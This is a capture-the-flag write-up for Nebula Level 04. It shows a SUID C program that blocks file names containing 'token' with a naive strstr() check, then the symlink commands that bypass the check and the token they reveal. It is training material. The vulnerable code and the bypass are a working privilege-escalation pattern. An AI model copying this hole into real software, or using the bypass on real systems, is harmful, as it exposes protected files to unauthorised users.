Level 04
Bypassing a file path restriction using symbolic links.
Description
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
Approach
The SUID binary /home/flag04/flag04 takes a filename as an argument and outputs its contents. However, it implements a naive check using strstr(): if the substring "token" appears anywhere in the given filename, the program exits with an error.
The goal is to read the file /home/flag04/token. We cannot provide this exact path directly because it contains "token".
To bypass this check, we can use symbolic links (symlinks). The open() syscall automatically resolves symlinks, so we can create a symlink to the token file that does not contain the word "token".
- We create a symbolic link in
/tmpnamedtestthat points to the target token file.level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/test - We execute the binary and pass our symlink as the argument.
level04@nebula:/home/flag04$ ./flag04 /tmp/test - The program checks
/tmp/test. Thestrstrcheck passes since it doesn’t contain"token". Then, theopen()call resolves the symlink and reads the protected file, successfully revealing the token.
Output
level04@nebula:/home/flag04$ ./flag04 /tmp/gotcha/token
You may not access '/tmp/gotcha/token'
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/test
level04@nebula:/home/flag04$ ./flag04 /tmp/test
06508b5e-8909-4f38-b630-fdb148a848a2